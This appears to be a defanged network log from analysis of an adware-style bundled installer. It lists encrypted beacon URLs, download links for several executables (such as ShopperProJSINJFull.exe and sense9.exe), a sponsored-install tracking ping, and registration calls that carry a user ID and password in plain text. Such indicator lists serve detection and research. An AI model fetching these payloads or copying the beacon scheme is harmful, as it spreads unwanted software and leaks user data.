hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvU9LJMZsFfgLwikIV33GIDtCUHeR8YCF3uoYeE0rOcJFt02cS7rp/atlhbkfYBqdFODY6aBYniWrrtxlwqwtaAT/S1HBgQtoithwOBgLvOFMv86gftLd19X1D9868HonIj9NWOW5Z1BfUQsLxVIQuR exLU7OdZsexuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvQ80kRIPHQS3QlB3kfGAhd3tM3uO6UFTierot47/97D/ I1VjLpwx1pXiNwermIPJaqcLsqnN14kxDoAIuanBxQI7ctFNLW92Fd9fuzXpLdMZuOl10dRSTozwxTsvpnVcXOyU386ibkNsTaFJlXWyu yt25iEwyPbjsvnWTmObjOwEISYEO9NS ukMkugzkCYw3hkUtKZ53m3WJytHC0lJh BoO5y99Rgk9gttj5ejpE= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/yta33_full.exe 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv0orsJnWEPXcHpxdxO 8fxymF904v4t2D/nc4J1Acff1o3N21n5Sarb/kefI4WQ1LxyQvi1UiSlerMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEZXZrelYJPLUYdPT9nrlrOwzThv/VXsFFUkiD//SLljTIUUNPzNqpdQ IQcLyoqcrddz3lZB7h1Z 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv1ZxVS/27BqDQlB3kfGAhd9dzn0FsWECIF/r hSUlo5i1FchkYiZplma3RmeQl3JV2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvk TnksFA3b2r56EmzsP6UAVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmnXTm7wyBWFg== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvFODQ1lUn gE8SFHLIEPsDtTHkxJSIEbrNszNzik7HYYan0yy1LdwNMNN2yVHejOq rbptvtlqPG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8l4rtrWyhaWBtd3 uKF6e7H0TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvTD6Ta2udfZc7NXiYomGMKI4G r 3F6T724ho44qODaqXEKiQKr1NVJrmuCxCYYRd4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJp/zL9PNaMx/usrAPq35vVlTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub6mEjn h1 Ryw== 198.232.124.192
hxxp://d3hm9b8fv0d908.cloudfront.net/mirror/nerocrossrider/appshat_generic.exe 54.230.46.102
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv2PzudKEWOJmRnC4IZxP4Ze5DeqO3aOt23qz6fCOm/YRKYywqw4E7oN090kXNAy/Jfzd3xSGgk5YE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvxgXaTksYVlZFZgsIXenIcYGYgeeWRYutpCM208LkghuKmMnnkN7Ts9jP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Pk55LBQN29q ehJs7D lAFQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpp105u8MgVhY= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv2mmPmExLeVKUfdGpw3nUgsMJc2jBTfyiqyYb9Bykje2/uCIFUAhjXasyuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRldmt6Vgk8tRh09P2euWs7DNOG/9VewUVSSIP/9IuWNMhRQ0/M2ql1D4hBwvKipyt13PeVkHuHVk= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WveKRzCupNECsE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT6UR/N6r03qZR90anDedSCtJwJAW8Acv9 CRTrfRId1tm02TdpGphdkpKwHx8Q4rlQbJJDfLoDoPECFOpxid0SQGNdQduoWijrX K4UHUEDKlS/RjlzGHj/fUmHjSuJJOba7jijygSN7xWHd62hcvEpYVIHBu2Qb16RDbKGwVPgtHLR5I4FQx69MbrO5DXfoloWbsH70W5C5 DlEXBO5VA2R O qPBqBgVJqUrTWk2/WuAKm8uNLGe2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvk TnksFA3b2r56EmzsP6UAVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmnXTm7wyBWFg== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT2c09RNjXm2nhGKsJ nm/eceLsPpRf2XK/wfuVH55sT/HJNxvR8F9wN4Jo1zqsFBZ6vzfePzdz3uYRgZSJAFDO6j8/6PPYRwf6UUiSf7Ytw32E4JdD9sRr3hn3Cy8OU86AIm/uvlmDmZ2fdkfFj7UjfD2uz1spPDRZr/vuRRrN94MWzcUtBe1IvKipqeIh4Ff5Z8rOU5JQjo5 USwmBaBEv/aGEto1iksXCto0JP0qSKmcY0Oj9sfqZ1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAQ VwoE0aIX/TbXnzkx FKL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkdY2ixM419Zxw== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtRWG4ZCMmDuMHSpt9GSHWXQP lJ0sv/YOYo/Vto7IfmWOHBo7F03Fys4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJp/zL9PNaMx/usrAPq35vVlTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub6mEjn h1 Ryw== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT1NzI6eOpBwJuuc9uz6WdZs IILilpWF2V9PoQYImhoi5ITADj fT8xuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT gjKfKdz3qVWyif 2VH4gkOB3v7aTq0F91k3KoBunFtjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Pk55LBQN29q ehJs7D lAFQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpp105u8MgVhY= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=Feo0TQZfu6KSwU3ck0Ywnv3K4Um6afGyT8HkmPir9E9AXdQqxJ1vaxGgYkoQykSFfl0yK7ww8bSszUmDSXfYhX1D9868HonIj9NWOW5Z1BfUQsLxVIQuR V8oZ3 d72V1JJpRAUOpYSeY/e3xqcYN8/PCEWlF5n7X4l9XCm/Va/LS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqVXwtCZfo4Zr9nup2DtfDPrER/kwSJZSa/eJIUUI29KJua/YhbaaQtbhLKDJ7gHH44roFtpr/bY5tMM9FOiO9IIcxXLgDRmHLIbieN4dwMAiQCgrTWge9c5pV1IGllrHIPLxQ3i9AquwZAf1w iJbx4= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=F94QJJu2atmfZNC1TqAoBEiw6T1aC40J1VMaOJFqXYpm5LT87ehXaouB5vT09TkZhae/9JiQCFNAKCtNaB71zmlXUgaWWscg8vFDeL0Cq7CQEZGf87LMbriKIFo3W8f23Wq7IsWCDz6iDpCkeA3CgLIrzGgLqVJ0XeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7iTVBvgC7nMd2EfZmulEUHKsyuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRldmt6Vgk8tRh09P2euWs7DNOG/9VewUVSSIP/9IuWNMhRQ0/M2ql1D4hBwvKipyt13PeVkHuHVk= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=o4wkB1bL2nL9yuFJumnxsp2fEZMWV9UQQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 8e7kS6GRZSsWgtg 4FS7F1Vson/tlR IJDgd7 2k6tB q19Viy2/FupU3Np6qd91awkCSR2NL95Z1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAQ VwoE0aIX/TbXnzkx FKL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkdY2ixM419Zxw== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 2F3CXDdsfBwVjr4IQgU6/17ym41MswgnBQC drCF7eFcz7 uAJ9xYcf1Z5o0mFOvr/vhPcFBsxkAjkJywGAYoQ8 KcWSiy /2tEQoG17P7tYpb spL69FcIA44xPc2qosLgx3 rkXj410HaaBVZzWyyyBfgdC/MPGdamvrUQZsSBJrpn5593i7JkPoDWmx/bJrdSyBxPRpgEPlcKBNGiF/021585MfhSi/zqB 0t3X1fUP3zrweiciP01Y5blnUF9RCwvFUhC5HWNosTONfWcc= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 2F3CXDdsfBwAhTD7v1xeC59AEINFij/sY4G r 3F6T7U58bcAumiKsE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/29141.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDdPs3rFng830D4jp1ub1aA0I6tVPrdYEHziRovMIdqiLY4G r 3F6T7f9F3I6C91SUE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/29141.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDdPs3rFng830D4jp1ub1aA0I6tVPrdYEHziRovMIdqiLY4G r 3F6T7t5jRtqLnIUBgBgQJlJRebp4dRxqvgD9SqzK4ONZfy8uwkk WHLaN3BOpzAENMeu5cVazcbc9chGV2a3pWCTy1GHT0/Z65azsM04b/1V7BRVJIg//0i5Y0yFFDT8zaqXUPiEHC8qKnK3Xc95WQe4dWQ== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/ShopperProJSINJFull.exe 198.232.124.192
hxxp://cds.c5z6s5a3.hwcdn.net/spd/shopp/iweb.exe
hxxp://cds.c5z6s5a3.hwcdn.net/spd/shopp/sense9.exe
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 2F3CXDdsfBwAhTD7v1xeC59AEINFij/sY4G r 3F6T7oXUs8Yi8f7xPq fcStKh6GdamvrUQZsSBJrpn5593i7JkPoDWmx/bJrdSyBxPRpgEPlcKBNGiF/021585MfhSi/zqB 0t3X1fUP3zrweiciP01Y5blnUF9RCwvFUhC5HWNosTONfWcc= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 2F3CXDdsfBwmtMU1uXBMoybSR66skE3WhQC drCF7eFih/ZYoECemlhN5Nq9bCx4Mo8BOSaWcoT1pd0pGQJZFEmvv7NOtxjUIEzPoKLI8Bo7LchnHKxLMLp9cMTh3UzKaHi8lJ8ZZ64jPDFOy mdVxc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9uOy dZOY5uM7AQhJgQ701L66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkQ== 198.232.124.192
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.7744544824062006
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=wlkQ3WKgYpT/HsUBn07KUri3muUffR3jOtjdAsNaFT54E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7d0DEJTT3H2hbUh 3ZGDmdW5pZis9f nTd2uwjb78QzN C k Oyp7Z IaFqajF lh UGsrpCk5t2P3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ObTDPRTojvSCHMVy4A0ZhyyG4njeHcDAIkAoK01oHvXOaVdSBpZaxyDy8UN4vQKrsGQH9cPoiW8e 198.232.124.192
hxxp://54.197.238.106/app/ping.ashx?e=657cd9m3NQFPNjxRBLtb4x0oukvXTQfet8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we Asnw T2O19KvsYrNjjnOLU6dbIHx4MCRqKGvMeRdM8NsizZtFUmLk2U6syuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRsFG5pEsdtecdHUE6VB5Ib5M QBWR3ZtvIt9ltQ LwNUfJKZ4NCKSCQ==
hxxp://54.197.238.106/app/ping.ashx?e=043Mckb8LnjKYf/qJ5z9H SrE0ez3DjNOEav83SZIOEyIvs8NVvu9kXFDxkTgufFt5aWEmvF1lmyibNNhHQuhoY2d8FdDMrliViAEPFo6Yp/1ErfmLF8//Y1HJKKgNFGH6nxT6mrRhaKj C8ts/rBwTxchauHrQ9hdXWs9gHCsWrLZx3iqhAOXSh4 HSf3cXZ8qiEfUAdDFv3UUxaCmaxO5DUMAeJYUVsXXNrU8MbsN7/ITptlmJcAeXrDcfXn1
hxxp://54.197.238.106/app/ping.ashx?e=AZwPyJy3TZhPNjxRBLtb45HdX0JUIFUOt8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we AsujghDckn/xgt lphzBReO6bK2Q7GGGnWJ281Et5v 1ivpBvzhFxOqDKzz2j1DKRExuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJegMBsN/V/kj2ANygAkC0Bha6lfIH DnKMZiwRfiQgeW Lmf6eHphUt9 inPTLZDtg=
hxxp://54.197.238.106/app/ping.ashx?e=AZwPyJy3TZhPNjxRBLtb45HdX0JUIFUOt8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we AsujghDckn/xgt lphzBReO6bK2Q7GGGnWJ281Et5v 1gpJLLN2z FnwCiBUKcGrTX6nvOi2lZHZeM8MU7L6Z1XFzslN/Oom5DbE2hSZV1srvsrduYhMMj23LymH6HWKlXaBQc7HR56MWNJxXQawroNmbktPzt6FdqlmEIUPwTJ2qmrvcVl0Mf/w==
hxxp://54.197.238.106/app/ping.ashx?e=uWabAt9SLcwd5zMhdw4gNv3K4Um6afGy2rWxJ8ENzMu9gdZ7vVVoir9hXn5fpF0AWcMhU uLDRW9bNt46T8oebkv4QX1tDHZYCpHZc9ZUaG9AEuBwweR31o8H6qezB8RqTFlxlzn4VIl8JkmZ/Wy9wpDKX/a3tH594khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjkZtVgFRKAib0rRptMshTXZhki2VnUOF/T8SaNRCRsmEQLMEicbqKjXDxJ w6ryxW8=
hxxp://online.goobzo.com/online/Register.aspx?CV=2.0.0.0&ProductID=12000&UserID=&Password=&OS=10&EMail=&Newsletter=&V=3.3.9.5&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList= 212.143.22.213
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=043Mckb8Lng3732dIkiRjr0oSfJOuBg0INaO4xo6fthi/MbJPcnCndJteToOegQWolvEm33cp87RtCIb96DZnR6RoJ10TU0s6CBrfbZ/enS9XnvFref6fjEsdSRpTTrrYOU1y/YINRGPoXLdfu1iHsN4ZFLSmed5t1icrRwtJSYfgaDucvfUYJPYLbY Xo6Rl8axoeNMkn6e1ZUE2Pql5n8tp3djqATVmXFZN21mt4jCW/lCH460cZqItAhOuCTzzP/VT GEYs73iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22Ocfvb9IYuqI5f6VK1qPKGu130R0eSeGqH4uB5vT09TkZhae/9JiQCFNAKCtNaB71zmlXUgaWWscg8vFDeL0Cq7CQEZGf87LMbmF2K0yaQKTQ 54.197.238.106
hxxp://online.goobzo.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1 212.143.22.213
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=aL/yzOcQGPn9yuFJumnxstwPQrKZIHXEQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 75u4m722PKD2/M8jJQIzSfeAVcyDPrG1hQC drCF7eFHh/LPABvBAscXPNbtq4ApuOFLk2t6neQ zLrLpIjsRUUyPhomD4IBnRzaRAF2XbeBAdSiYySX1ABO9CgPGV4WwPGAmcePe PU/67/t1IJfTYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW T5OeSwUDdvavnoSbOw/pQBUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKaddObvDIFYW 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=zfalGciLwF 9KEnyTrgYNBkOFeMa2BXRjA5kVqVgWdD8SaNRCRsmEYzpbjeDHyvNcXmwpx0AGovkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpRn2gxeEj mlVHmS0Zrngqa/u6z7Uinv/hOGjGA0YZy31hITs1b/36emtnRdFSmbGuENvzEMy06jATxIUcsgQ wO1MeTElIgRus2zM3OKTsdhhqfTLLUt3A0w03bJUd6M4vq0Igx Id3Ap9gpWuStVadsGPZKyniMHL Evyupn5FoSAG857z6vSwF4eCz1DvrniLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmn/Mv081ozH 6ysA rfm9WVNQSv/p7VOKxutsBl Vzbv6Wf6c6axcuIYxoZmnL9RvqYSOf6HX5HL 198.232.124.192
hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1 212.143.22.213
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/12767.ashx?e=wlkQ3WKgYpRPNjxRBLtb449we4XQqEV6/WD6e6SZIIHeyzV7AofXlhYwsCIys4jFl9RbU5Ar lxObnHKVsttiOLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8YJpucY5gZaR711If7ZLdKSAZ5SkcchaJJJ9Fy4h9HR9S7QojUgCmBeLyj8PdRsUbWGOnOu3i3XawADzuWvml5Co96KQrvxHzFtz73aJdyQ8sj2VHenQSi 0LhpxXD4t4eCmOKii sWodZTjDiKj8nmywgV52R4NzBT4DqSJhyM3mODCqGlX7dFUAApkcaIS g 3gvHMozU99ecNw3qM44/lSIKq0UdoUdMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEHSoZq9bNUnidXu6HZZj G6u8rYnA8EzX4JIE87/jfWsid6KRE16wYsqtKrDF7mr6U IgqjBtPrQZNslBbwbrzm8HqzDlA5LEOcQDW2ub8rgHR1BOlQeSG TPkAVkd2bb1HMP2IfnNA/cEXCuD7ISRf2T mvjIH/Ay5ismV6Zmv0elWnPCijCkMjOCgw2BVJml3HgtDvmRKdu9i5y3Idvu/iLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvfwqbgkyABd 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/12767.ashx?e=wlkQ3WKgYpRPNjxRBLtb449we4XQqEV6/WD6e6SZIIHeyzV7AofXlhYwsCIys4jFl9RbU5Ar lxObnHKVsttiOLt6BhzfOsDBXnWkuh5LzaUfdGpw3nUglF9z0WypnnGstnhkcefCVXiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvfwqbgkyABd 198.232.124.192
